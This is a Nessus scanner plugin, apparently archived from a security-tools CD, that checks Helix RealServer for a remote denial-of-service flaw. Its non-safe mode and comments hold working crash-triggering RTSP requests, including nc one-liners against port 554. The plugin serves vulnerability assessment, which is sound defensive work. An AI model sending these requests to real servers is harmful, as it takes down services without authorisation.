home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / helix_dos.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  83 lines

  1. #
  2. # Copyright (C) 2004 Tenable Network Security
  3. #
  4.  
  5. if(description)
  6. {
  7.  script_id(12210);
  8.  script_bugtraq_id(10157);
  9.  script_cve_id("CAN-2004-0389");
  10.  script_version ("$Revision: 1.3 $");
  11.  
  12.  name["english"] = "Helix RealServer Remote DoS";
  13.  script_name(english:name["english"]);
  14.  
  15.  desc["english"] = "
  16. RealServer versions prior to 9.0.3 are vulnerable to
  17. a trivial remote Denial of Service (DoS) attack. 
  18.  
  19. See also : http://www.idefense.com/application/poi/display?type=vulnerabilities
  20.  
  21. Solution: Install patches from vendor
  22. Risk factor : High";
  23.  
  24.  script_description(english:desc["english"]);
  25.  
  26.  summary["english"] = "RealServer and Helix Server remote DoS";
  27.  script_summary(english:summary["english"]);
  28.  
  29.  script_category(ACT_MIXED_ATTACK);
  30.  
  31.  script_copyright(english:"This script is Copyright (C) 2004 Tenable Network Security");
  32.  family["english"] = "Denial of Service";
  33.  script_family(english:family["english"]);
  34.  script_dependencie("find_service2.nasl");
  35.  script_require_ports("Services/rtsp", 554);
  36.  exit(0);
  37. }
  38.  
  39.  
  40. # start script
  41.  
  42. port = get_kb_item("Services/rtsp");
  43. if(!port)port = 554;
  44.  
  45. if (safe_checks()) {
  46.      if (get_port_state(port)) {
  47.          soc = open_sock_tcp(port);
  48.          if (soc) {
  49.              data = string("OPTIONS * RTSP/1.0\r\n\r\n");
  50.              send(socket:soc, data:data);
  51.              header = recv(socket:soc, length:1024);
  52.              if(("RTSP/1" >< header) && ("Server:" >< header)) {
  53.                  server = egrep(pattern:"Server:",string:header);
  54.                  if( (egrep(pattern:"Version [0-8]\.[0-9]", string:server)) ||
  55.                        (egrep(pattern:"Version 9\.0\.[0-2]", string:server)) ) {
  56.                             security_hole(port);
  57.                  }
  58.             }
  59.         close(soc);
  60.         }
  61.      }
  62. } else {
  63.     # per idefense adivisory
  64.     # $ echo -e "GET_PARAMETER / RTSP/1.0\n\n" | nc -v localhost 554
  65.     # $ echo -e "DESCRIBE / RTSP/1.0\nSession:\n\n" | nc -v localhost 554
  66.     req[0] = string("GET_PARAMETER / RTSP/1.0\n\n");
  67.     req[1] = string("DESCRIBE / RTSP/1.0\nSession:\n\n");
  68.     req[2] = string("GET / RTSP/1.0\n\n");
  69.     for (i=0; req[i]; i++) {
  70.         soc = open_sock_tcp(port);
  71.         if (!soc) {
  72.             if (i > 0) security_hole(port);
  73.             exit(0);
  74.         }
  75.         send(socket:soc, data:req[i]);
  76.         close(soc);
  77.     }
  78. }
  79.     
  80.  
  81.  
  82.  
  83.